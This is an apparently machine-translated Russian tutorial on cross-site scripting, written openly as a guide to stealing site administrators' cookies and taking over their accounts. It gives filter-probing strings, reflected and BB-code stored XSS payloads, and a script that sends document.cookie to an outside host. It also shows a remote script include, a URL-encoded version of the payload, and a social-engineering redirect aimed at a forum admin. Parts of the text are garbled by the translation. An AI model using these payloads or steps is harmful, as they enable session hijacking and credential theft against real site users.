Description Xss from A to Z.
Xss is Css => Cross Site Scripting
Not to be confused with CSS is also called XSSFor the first time this BAG appeared in 1997.
How to use XSS.
First, we need to know what a cookie is.
If you know, you can skip.
Cookies are used to store site credentials on the visitor's computer.
If you registered on the site under the nickname 'blabluble', then the site has saved a file with cookies on your computer, where your data is encoded.
And if you have an administrator and you have access to the site, and I am a user who stole from you (admin) cookies, then I can safely go to the site, and the site defines me as 'admin' - I will have administrator rights.
To change (substitute stolen) cook I advise you to use CookieEdit for IE or built-in functions in Opera and Firefox.
To intercept cookies, you need to find a place on the site where you can perform an XSS attack.
What is an XSS attack?
XSS attacks are attacks not on the site itself, but on users of the site.
XSS is a flaw in the filter, application.
There are passive XSS and active XSS.
What is passive and active XSS?
Passive - this Xss, which require the victim to participate directly + there are specific limitations and difficulties.
Therefore, passive XSS is not very appreciated.
For example, you need to make it pass through a poisonous link, which will require social engineering, cunning.
Active - this XSS, which does not require any additional action from the victim - it is enough just to open the page with your XSS and the Java code will be executed automatically.
Thanks to their automation - they are very useful and valuable.
For example, active xss exists in BB tags because of insufficient filtering, when you leave a message on the forum \ guestbook \ chat, which will always be active with each update.
So, I'll go specifically to how to find in this site XSS.
As I wrote before that XSS consists of tags, they also consist of html, and javascript =).
Javascript can be entered in html.
Can be encoded to bypass filters. But more on that later.
How do you know that XSS on a given site is going through?
Horrible freakiness of type
<Script> alert () </ script> We are trying to insert this script into all the different fields ... if a message has appeared, the script has been processed and executed.
The most common XSS (observed in all places where bad filtering):
"> <Script> alert () </ script>
The whole point is "> .
Let's think about what we do when we type in the "> <script> alert () </ script> field , what happens?
We enter a variable in the form "> <script> alert () </ script> of a variable." The variable is processed, "> executes, closes
Script and invokes <script> alert () </ script>
This XSS is the most popular in search engines:
We scan all the fields of the site and try to insert "> <script> alert () </ script>
If the message came out - you found XSS ...
And how to determine if there is a filter or not?
Just in any field, enter: '';! - "<########> = & {()}
Then open the html page and look for the word "########"
And see the subsequent sivoli ..
If <> it remains that this is the first sign of vulnerability - then the filter has a hole.
If , "\ \ characters are the same as they were entered - this is the second sign of the vulnerability - possible additional characters for the subsequent XSS attack.
Then, if you opened HTML, you did not find <> then most likely a hole in the filter.
If you open HTML, you find that <> is replaced with other characters, then this is a bummer - an absolute filter
It functions normally.
It is also possible to enter the following in the field to check the filtering: "> <> '" `, / \? @%
Consider the case if the filter eats <>
In this case there is a hole probability.
For example, a filter has the condition to eat <script>, <> and.
Then try <zxcvb script: alert ();
The filter looks that nothing is dangerous in <IMG% 20SRC = "java script: alert (); no, it closes and thereby
Executing the script.
Of course, if the filter does not filter different encodings, you can try to encode the script and insert the code.
All you have to try and find ...
Try to enter in the fields and carefully review what we got from the filter.
The method of tyke to understand how the filter works, whether it has any flaws.
If the filter is bad, we can always insert scripts.
Active XSS
Here you need to use the allowed tags and then hide them, you need to execute the query.
For example, tags url, bb, img.
The whole point of the insertion is that we need to embed the query into the img or url parity. Img has many parameters except src and alt.
This bug is very often used on the forum, in guestbooks ...
Consider active XSS.
Warnings !!!
Tags [fon * t], [im * g], [ur * l] are written with * to ensure that they do not merge with the site code.
To use these tags, delete * .
For example, review the forum for the use of tags [fon * t], [im * g], [ur * l] and try to insert a script into them or combine them:
[Im * g] httr: //www.qwewqw.ru/1.jpg [/ im * g] There is a cross ... means img is used and we picked it up (it's just that there is img enabled, and admins from Creating a message it is removed, saying the pictures can not be inserted and it can be used
Different forms) if there is no cross ... and the entire inscription hangs, then try this:
[Im * g src = httr: //www.qwewqw.ru/1.jpg]
Well, for example, we have achieved a cross with this:
[Im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]
Check whether the filter holds a space, add a space after the extension jpg:
[Im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]
If there is a cross - then everything is OK.
Further there are img parameters dynsrc and lowsrc that hold javascript. We try to insert for example:
[Im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
Check, send - the message appears - it means you found the active XSS and instead of alert () you can insert any script.
If the filter does not give up try this:
[Im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
and
[Im * g] http://www.qwewqw.ru/ "/ dynsrc = java script: alert () / 1.jpg [/ im * g]
If, from the above examples, a cross was obtained, then httr: //www.qweqw.ru/1.jpg is replaced with the address of the sniffer.
There are times when jpg is disabled by the administrator.
We always did codes like:
<script>alert('HakNet')</script>
java script:alert('HakNet')
java script:alert('HakNet')/1.jpg и так далие..
But they did not bring any benefit, they are just codes for testing (testing) on Xss. Here's the script:
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
He already steals cookies =) How can I substitute it for a link with Xss?
Yes, very easy ...
There are several options:
- 1) we do this:
http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> where **** the site with Xss. Here is a compiled script:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script> - 2) You can still do this:
http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http: // haknet .h16.ru / script / js.js And in js.js there are:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; This method is more reliable. But as I already wrote - sometimes there are difficulties with the filters on the site (our script does not roll).
Then you need to think about how to get around it.
You can just add something, change something, or delete it in a script.
But there is a more reliable option when we just code the script. There are a lot of progs for this.
There is such a site as http://ha.ckers.org/xss.html (encoder-decoder).
Here's an example:
%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E It was coded:
http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> - 3) Especially encryption is needed not only to deceive the filters, but also to deceive ADMIN when using passive CSU.
Here is an example based on social engineering.
We are looking for contact with the forum administrator, we throw him a link to his site in the forum, and he says that such a "cool feature is on the site" and so far in the same spirit.
And on our site will be as you already guessed =) here is the script:
<script language="JavaScript">
document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
</script> What does document.location.href do you ask me? )) .. This is Java code, which without a request goes to the specified site. So cho does it, we give a link to the admin, and he went to our site, that's what is done .. he quickly throws it on
%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this is already our Xss in encrypted form. Note: this will only work when Xss will belong to the site administrator to whom you left the link ...
In other words, the DIFFICULTY OF PASSIVE CSU is that vulnerability can be used ONLY if the victim is AUTHORIZED on a vulnerable site !!!
Comments
Commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.